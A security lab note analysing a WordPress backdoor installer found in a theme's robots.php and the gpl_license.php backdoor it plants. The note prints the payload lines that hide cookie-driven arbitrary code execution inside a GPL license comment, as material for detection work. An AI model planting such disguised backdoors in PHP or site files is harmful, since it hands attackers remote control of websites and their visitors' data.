Straightforward Backdoor Installer

Labs Note

Malware uses encryption, obfuscation and other tricks to prevent its detection so that the compromised sites stay infected for as long as possible. Quite often it’s not easy to spot a malicious code even if you see it, especially if you are not a professional programmer or security analysts.

But sometimes, the malware is very straightforward. For example, we found this backdoor installer in file called robots.php in one WordPress theme. It doesn’t use any encryption, has properly indented code and very clear descriptive variable name and comments. You shouldn’t think twice when you see such a code:

class Searcher
{
    private $backdoor;
...
    private $backdoorName = 'gpl_license.php';
...
    public function __construct($backdoor)
    {
        $this->backdoor = $backdoor;
    }
...
    $this->chooseDirsForBackdoor();
    while ($this->hasUnconfirmedBackdoors()) {
        $this->addBackdoors();
        $this->checkBackdoors();
    };
...

However this file is only used at early stages of infections when attackers just got access to a vulnerable website and managed to upload this file to the server. Then they use this backdoor installer to create multiple backdoors (gpl_license.php in this case) in various directories. That gpl_license.php backdoor is much more obscure and you might even confuse it with a real license file as if you quickly scroll it, you will only see a real GNU GPL license

<?php /*            GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007
...

Only if you carefully inspect the file you will notice that It’s actually a PHP file and the license text is inside the multiline comment. However, inside the license text, there are two short comment breaks that contain PHP code that allows to execute arbitrary code passed in HTTP cookies:

...
giving you */extract($_COOKIE);/* copy, distribute and/or modify it.
...
which are not */@$F&&@$F($A,$B);/*.  For example, Corresponding Source
...

These two backdoors that use completely different approaches to obfuscation are part of the same attack, which proves that you can never tell what a typical backdoor is and what exactly webmasters should be searching for when we say that they should find and remove all backdoors. Actually, backdoors are the most versatile type of website malware. We have more than a thousand samples of different backdoors and still we find new variations every day. Probably, the most efficient way to detect backdoors is a file integrity monitoring that will report all added/modified files regardless of the code that was added. If you don’t use such a monitoring and want make sure you didn’t miss any backdoors on your server, you can have us scan your site for thousands of different malware patterns.

You May Also Like